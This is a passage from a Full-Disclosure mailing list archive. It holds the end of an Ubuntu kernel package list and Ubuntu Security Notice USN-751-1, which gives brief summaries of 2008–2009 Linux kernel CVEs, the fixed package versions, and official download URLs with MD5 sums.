    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   168032 57b82e9400b5d78b2d24b8a0b28c817e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    42272 2cae82109217d5f1d9fb0181cb3222c5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    44874 cd310accdae92fedb4a469e35907ead6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   320282 b6312389f60802c6e515c0206981872e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   324708 4bd6d6dea4578254f72c377dafaf8e6e
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-power3-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23828 22ab0f1c66109cefffc823cd8b98c9c7
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-power3_2.6.15.55_powerpc.deb
      Size/MD5:    23762 8f9bb8d2909b027204dcb96c8d173e54
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-power4-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23828 210b4531b577a51032ed39f2f1de5245
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-power4_2.6.15.55_powerpc.deb
      Size/MD5:    23762 5e0195af54a374331b1aead52faf6e55
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-powerpc-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23798 025309a7c02fcc2dea1a41d9a96429e6
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-powerpc64-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23792 1f3199b1f416a5d9e9a5d8d4e22fc43d
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-powerpc_2.6.15.55_powerpc.deb
      Size/MD5:    23730 9ee24c91189c7c58aa5c2bbb52a60a66
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-restricted-modules-powerpc-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23816 e90157b180a67ddb2e8251d34a3835ba
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-restricted-modules-powerpc_2.6.15.55_powerpc.deb
      Size/MD5:    23744 80de74831d0552f5e45b24e8b2e941bd
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-54-powerpc-smp_2.6.15.12-54.5_powerpc.deb
      Size/MD5:  1340366 6b67ca9b5b03c6d2a85ac78386b78eff
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-54-powerpc_2.6.15.12-54.5_powerpc.deb
      Size/MD5:  1335498 c43866feae273e76376cbd33a47bd3f9
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-firmware-2.6.15-54-powerpc-di_2.6.15.12-54.5_powerpc.udeb
      Size/MD5:   798762 efb6a594218f282a47b940ad30aac450
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-modules-2.6.15-54-powerpc-di_2.6.15.12-54.5_powerpc.udeb
      Size/MD5:   508440 ccf2251e3a634b91668cf2037f979567

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-sparc64-smp_2.6.15-54.12_sparc.deb
      Size/MD5:   186888 97b850f7df5a64c24f2f4f220143bfa2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-sparc64_2.6.15-54.12_sparc.deb
      Size/MD5:   186020 33b3197bd80f6d37585e4a4cf4daa3be
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-54-sparc64-di_2.6.15-54.12_sparc.udeb
      Size/MD5:   100676 76131c793e3d263b763405852c4fc288
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-54-sparc64-di_2.6.15-54.12_sparc.udeb
      Size/MD5:   105820 957eb1e86eb9015c7b381d335f0c090d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-sparc64-smp_2.6.15.55_sparc.deb
      Size/MD5:    23724 8583f789807d0911758652a578736607
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-sparc64_2.6.15.55_sparc.deb
      Size/MD5:    23720 9ba3ecab61104901c5db6fa5f26fa1ba
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-sparc64-smp_2.6.15.55_sparc.deb
      Size/MD5:    23738 5cd9339072c0410d58f5ec273b9953fd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-sparc64_2.6.15.55_sparc.deb
      Size/MD5:    23720 13378136f01f4e407c1f5861639ed0ed
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-sparc64-smp_2.6.15.55_sparc.deb
      Size/MD5:    23734 7422abfc0e425169b29334f62b364de1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-sparc64_2.6.15.55_sparc.deb
      Size/MD5:    23716 130855f5fa08db79cedf4d4c246c503f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-sparc64-smp_2.6.15.55_sparc.deb
      Size/MD5:    23750 b17baa0d8bc141136b4424b0b893dc76
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-sparc64_2.6.15.55_sparc.deb
      Size/MD5:    23734 4d9e605364d59635058eb0105ff59e79
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:    50476 05994139d7b84b71e689debbbf33e0a5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:     2362 c500da9f0cd290e3d4c93b61173ce25d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:    40334 a2b1946286decc692ca5966cd4aecc45
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:   110532 e85c0f027fccab2a3136c5f488085f78
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:    41180 b14ba84f8dd20361e68218eae1dc09a7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:   104242 12632a7309b6a81b97457e6f8d09341a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:     7434 2f7c73797500953e721a76ce6089f4f6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:   149012 430d179b37a71af5c98ae2c60d996b50
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:  1710700 e1e945d6dbe40101121ae5fe16d998d2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-sparc64-smp_2.6.15-54.76_sparc.deb
      Size/MD5:   770238 88eeea10b26324b96d629549d6735295
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-sparc64_2.6.15-54.76_sparc.deb
      Size/MD5:   771158 c6867d936b98b5301ed4d653ac4870df
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.76_sparc.deb
      Size/MD5:  6962626 b52608f6e1a673c17780560c85bc685c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-sparc64-smp_2.6.15-54.76_sparc.deb
      Size/MD5: 15009602 d145fe73dd209e06dfb912f9fa1cf08d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-sparc64_2.6.15-54.76_sparc.deb
      Size/MD5: 14829492 de248026b9007e98c749a5cf4a7d323c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:     7426 fe159ecca6a3c59dc739548f996a3cd0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:   248696 73c8d619323091c9bea5abe097ea84ad
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:   212388 0e35cbaedb577f9efb2ce5578402e063
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:  1048464 e4e2b3b56433433563cf625959298c9f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:  1481820 4b2d651a87a3a6085ef62066142aad2f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:    10118 1b54ad10ecc694db8cbfd6d55ef0814a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:    40170 deb2e3f88763ec1ed12c75c5db373e4f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:     9368 50c6f1d15afe24b44852567450878b7f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:    61484 db543da8a2bde794d48c7d3404a1b48e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:   163032 6c7df4c33e46323789c9c2be5700b600
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:    64008 4ba1cc7c1f80a9891f68a9920b4afe2f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:  1235064 f808dd36a099fe0a6dc872b9d383bece
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:    59354 8123b34898eecb15ebcf5c61b2520af9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:    37408 e06ba07b0cf43bc0b9dac0546bad975e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-sparc64-di_2.6.15-54.76_sparc.udeb
      Size/MD5:   280074 d59b5c9383a7942677923961d3492711
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-restricted-modules-sparc64-smp_2.6.15.55_sparc.deb
      Size/MD5:    23762 c250dbdfd194c61d545755fe9797bedc
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-restricted-modules-sparc64_2.6.15.55_sparc.deb
      Size/MD5:    23750 6ee1df50af25303eb4000b84b6e134ca
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux_2.6.15.55_sparc.deb
      Size/MD5:    23694 51df8e14dbb9318ef7e125a09b198800
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-54-sparc64-smp_2.6.15.12-54.5_sparc.deb
      Size/MD5:   828154 acda518403b974c6d79f1738826b719f
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-54-sparc64_2.6.15.12-54.5_sparc.deb
      Size/MD5:   828098 09e8ea023b00bc2f934ff9ff7c1f4487

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 235 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090407/e7e79b4c/attachment.bin 

From kees at ubuntu.com  Tue Apr  7 01:04:30 2009
From: kees at ubuntu.com (Kees Cook)
Date: Mon, 6 Apr 2009 17:04:30 -0700
Subject: [Full-disclosure] [USN-751-1] Linux kernel vulnerabilities
Message-ID: <20090407000430.GQ7449@outflux.net>

===========================================================
Ubuntu Security Notice USN-751-1             April 07, 2009
linux, linux-source-2.6.22 vulnerabilities
CVE-2008-4307, CVE-2008-6107, CVE-2009-0028, CVE-2009-0031,
CVE-2009-0065, CVE-2009-0269, CVE-2009-0322, CVE-2009-0605,
CVE-2009-0675, CVE-2009-0676, CVE-2009-0745, CVE-2009-0746,
CVE-2009-0747, CVE-2009-0748, CVE-2009-0834, CVE-2009-0835,
CVE-2009-0859, CVE-2009-1046
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  linux-image-2.6.22-16-386       2.6.22-16.62
  linux-image-2.6.22-16-cell      2.6.22-16.62
  linux-image-2.6.22-16-generic   2.6.22-16.62
  linux-image-2.6.22-16-hppa32    2.6.22-16.62
  linux-image-2.6.22-16-hppa64    2.6.22-16.62
  linux-image-2.6.22-16-itanium   2.6.22-16.62
  linux-image-2.6.22-16-lpia      2.6.22-16.62
  linux-image-2.6.22-16-lpiacompat  2.6.22-16.62
  linux-image-2.6.22-16-mckinley  2.6.22-16.62
  linux-image-2.6.22-16-powerpc   2.6.22-16.62
  linux-image-2.6.22-16-powerpc-smp  2.6.22-16.62
  linux-image-2.6.22-16-powerpc64-smp  2.6.22-16.62
  linux-image-2.6.22-16-rt        2.6.22-16.62
  linux-image-2.6.22-16-server    2.6.22-16.62
  linux-image-2.6.22-16-sparc64   2.6.22-16.62
  linux-image-2.6.22-16-sparc64-smp  2.6.22-16.62
  linux-image-2.6.22-16-ume       2.6.22-16.62
  linux-image-2.6.22-16-virtual   2.6.22-16.62
  linux-image-2.6.22-16-xen       2.6.22-16.62

Ubuntu 8.04 LTS:
  linux-image-2.6.24-23-386       2.6.24-23.52
  linux-image-2.6.24-23-generic   2.6.24-23.52
  linux-image-2.6.24-23-hppa32    2.6.24-23.52
  linux-image-2.6.24-23-hppa64    2.6.24-23.52
  linux-image-2.6.24-23-itanium   2.6.24-23.52
  linux-image-2.6.24-23-lpia      2.6.24-23.52
  linux-image-2.6.24-23-lpiacompat  2.6.24-23.52
  linux-image-2.6.24-23-mckinley  2.6.24-23.52
  linux-image-2.6.24-23-openvz    2.6.24-23.52
  linux-image-2.6.24-23-powerpc   2.6.24-23.52
  linux-image-2.6.24-23-powerpc-smp  2.6.24-23.52
  linux-image-2.6.24-23-powerpc64-smp  2.6.24-23.52
  linux-image-2.6.24-23-rt        2.6.24-23.52
  linux-image-2.6.24-23-server    2.6.24-23.52
  linux-image-2.6.24-23-sparc64   2.6.24-23.52
  linux-image-2.6.24-23-sparc64-smp  2.6.24-23.52
  linux-image-2.6.24-23-virtual   2.6.24-23.52
  linux-image-2.6.24-23-xen       2.6.24-23.52

Ubuntu 8.10:
  linux-image-2.6.27-11-generic   2.6.27-11.31
  linux-image-2.6.27-11-server    2.6.27-11.31
  linux-image-2.6.27-11-virtual   2.6.27-11.31

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

Details follow:

NFS did not correctly handle races between fcntl and interrupts. A local
attacker on an NFS mount could consume unlimited kernel memory, leading to
a denial of service. Ubuntu 8.10 was not affected. (CVE-2008-4307)

Sparc syscalls did not correctly check mmap regions. A local attacker
could cause a system panic, leading to a denial of service. Ubuntu 8.10
was not affected. (CVE-2008-6107)

In certain situations, cloned processes were able to send signals to parent
processes, crossing privilege boundaries. A local attacker could send
arbitrary signals to parent processes, leading to a denial of service.
(CVE-2009-0028)

The kernel keyring did not free memory correctly. A local attacker could
consume unlimited kernel memory, leading to a denial of service.
(CVE-2009-0031)

The SCTP stack did not correctly validate FORWARD-TSN packets. A remote
attacker could send specially crafted SCTP traffic causing a system crash,
leading to a denial of service. (CVE-2009-0065)

The eCryptfs filesystem did not correctly handle certain VFS return codes.
A local attacker with write-access to an eCryptfs filesystem could cause a
system crash, leading to a denial of service. (CVE-2009-0269)

The Dell platform device did not correctly validate user parameters. A
local attacker could perform specially crafted reads to crash the system,
leading to a denial of service. (CVE-2009-0322)

The page fault handler could consume stack memory. A local attacker could
exploit this to crash the system or gain root privileges with a Kprobe
registered. Only Ubuntu 8.10 was affected. (CVE-2009-0605)

Network interfaces statistics for the SysKonnect FDDI driver did not check
capabilities. A local user could reset statistics, potentially interfering
with packet accounting systems. (CVE-2009-0675)

The getsockopt function did not correctly clear certain parameters. A local
attacker could read leaked kernel memory, leading to a loss of privacy.
(CVE-2009-0676)

The ext4 filesystem did not correctly clear group descriptors when
resizing. A local attacker could exploit this to crash the system, leading
to a denial of service. (CVE-2009-0745)

The ext4 filesystem did not correctly validate certain fields. A local
attacker could mount a malicious ext4 filesystem, causing a system
crash, leading to a denial of service. (CVE-2009-0746, CVE-2009-0747,
CVE-2009-0748)

The syscall interface did not correctly validate parameters when crossing
the 64-bit/32-bit boundary. A local attacker could bypass certain syscall
restricts via crafted syscalls. (CVE-2009-0834, CVE-2009-0835)

The shared memory subsystem did not correctly handle certain shmctl calls
when CONFIG_SHMEM was disabled. Ubuntu kernels were not vulnerable, since
CONFIG_SHMEM is enabled by default. (CVE-2009-0859)

The virtual consoles did not correctly handle certain UTF-8 sequences. A
local attacker on the physical console could exploit this to cause a system
crash, leading to a denial of service. (CVE-2009-1046)


Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-16.62.diff.gz
      Size/MD5:  3677297 3af426b001c5c2fef89d20ee1b60ba75
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-16.62.dsc
      Size/MD5:     2308 a0a2ce8bf274bae12657e72067399118
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22.orig.tar.gz
      Size/MD5: 56913972 c98e1329975a8a7931ae63bafe39b63a

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-doc-2.6.22_2.6.22-16.62_all.deb
      Size/MD5:  4616870 76ebf68b36a4e7f60541f1be1f7dde66
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16_2.6.22-16.62_all.deb
      Size/MD5:  7779114 c04278f0213c6f59788823eb39947328
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-kernel-devel_2.6.22-16.62_all.deb
      Size/MD5:    50048 3f3d9e6e22adaefb0bdf3d63d023cb9e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-16.62_all.deb
      Size/MD5: 45362502 eb127ab606a93b1f752bd2eaa5888db9

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    24802 c1a5986d0e9ec43c61878e4e0b1bd40e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:   216524 9428bb809db0641321dc41b428bc6be8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    49170 728c6ee9d484e067524ae2542b9a68f6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    40036 6fa89e7b6946dbe22472ed911ab52f44
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    51754 1a900f93215c4c0700c11e5bc0578951
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    87880 80272a324bd22d01962c12707114cacf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    35852 34ce03391ac1dc5906a049a517a19a53
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:   652058 89d446f3563c836cab7bc2df5e59902c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:   206050 630e2376aba81fe91e81b32dca050ff8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    55590 d671b920ae01b43ad7facd9e344067e0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    60514 e7d211ab8ed50da6c6bae220fa20da47
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:   146260 d7e6b96b2c61f3dc526bd999375cac4b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:   285884 fc0b5ad14990d1089024699c2c582f11
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:  1947632 671b9d50b2b8c6b4a9cb71da066944bb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-generic_2.6.22-16.62_amd64.deb
      Size/MD5:   595658 840dd66409baac5c3c0f4516ba20b9d5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-rt_2.6.22-16.62_amd64.deb
      Size/MD5:  1167628 89808144584d5d20d2cba37259c7054a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-server_2.6.22-16.62_amd64.deb
      Size/MD5:   595840 b24b97308ac280dcdd4cb91b5680de14
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-xen_2.6.22-16.62_amd64.deb
      Size/MD5:   950968 2d1f99661157e42cb2a67ceeabb3a929
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-16-generic_2.6.22-16.62_amd64.deb
      Size/MD5: 17541898 42c8b69a992186c634e542c573221e05
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-16-server_2.6.22-16.62_amd64.deb
      Size/MD5: 17588064 8d10846418da30dc566760fb7788ab50
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-16-generic_2.6.22-16.62_amd64.deb
      Size/MD5: 18755732 771bc48a46f7f1b641154f84d71e9c21
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-16-server_2.6.22-16.62_amd64.deb
      Size/MD5: 19060452 fe85d8c9c36e966ae6a724b5ecd971c6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-16.62_amd64.deb
      Size/MD5:   655388 d966bf7a70e6da295ba9c0218509d1cd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:   252154 c9eb49c0d78b88fdbfa70ac149862554
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:   150726 92b60da6ccfffef513191b57fdfea67a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:   236348 0d9f7f132d373d1bfd56e590525d4ab8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:  1449120 3e78d86112e2cd7343ddfd8efcea3ccc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:   142710 8bf086ced17d0a3fff205b05051862b3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:   148654 86cddfbeeb78249890dfd377be4b3a73
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    85976 349a1a09cc589d3e21294f543ec679cb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    35430 bdaf39a7638b1c25f9f516e1c19c85c9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    38394 42f4cf3609fdb050201c52177ccf4f4e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    70016 d91b455419d3ab5d32b43b2ed2df85e5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    21468 dcb3220a60399b15677cd6a0dc75f04f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:     8656 deaaf19861c379453afcddf575956f7a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    56430 072095ef9731ec7ef792ecedc0964c0e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    87984 3894dbca37d274c4ef5c70ab3e986ff4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:  1101000 bc127601c78c2b7abbbac62bbadcdd37
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    45194 372d17c6b5b62213c92fb3dd2af3ae99
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    12686 005706d8b6405e4aaba7c58c36edd8d2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
